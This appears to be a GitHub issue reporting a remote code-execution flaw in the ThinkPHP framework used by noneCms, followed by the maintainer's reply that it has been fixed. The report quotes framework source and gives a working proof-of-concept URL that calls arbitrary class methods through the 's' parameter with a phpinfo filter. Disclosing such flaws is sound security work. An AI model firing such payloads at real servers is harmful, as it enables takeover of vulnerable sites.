There is a code execution vulnerability that can getshell

[twosmi1e]

thinkphp/library/think/App.php

public function routeCheck()
    {
        $path = $this->request->path();
        $depr = $this->config('app.pathinfo_depr');

 public function path()
    {
        if (is_null($this->path)) {
            $suffix   = $this->config->get('url_html_suffix');
            $pathinfo = $this->pathinfo();
            if (false === $suffix) {
                // 禁止伪静态访问

public function pathinfo()
    {
        if (is_null($this->pathinfo)) {
            if (isset($_GET[$this->config->get('var_pathinfo')])) {
                // 判断URL里面是否有兼容模式参数
                $_SERVER['PATH_INFO'] = $_GET[$this->config->get('var_pathinfo')];
                unset($_GET[$this->config->get('var_pathinfo')]);
            } elseif ($this->isCli()) {
                // CLI模式下 index.php module/controller/action/params/...
                $_SERVER['PATH_INFO'] = isset($_SERVER['argv'][1]) ? $_SERVER['argv'][1] : '';
            }

In the process of processing the route, Config::get(‘var_pathinfo’) is used as the receiving process pathinfo, and this value is s by default.
then, it will form a calling process: index.php?s=index/\namespace\class/method
In \think\Request

public function __construct($options = [])
    {
        foreach ($options as $name => $item) {
            if (property_exists($this, $name)) {
                $this->$name = $item;
            }
        }

        $this->config = Container::get('config');

        if (is_null($this->filter)) {
            $this->filter = $this->config->get('default_filter');
        }

        // 保存 php://input
        $this->input = file_get_contents('php://input');
    }

we can use input method
POC:http://localhost:90/noneCms/public/?s=index/\think\Request/input&filter=phpinfo&data=1

[twosmi1e]

[nangge]

谢谢反馈！现已把核心框架更新至官方最新版，ThinkPHP官方已修复该bug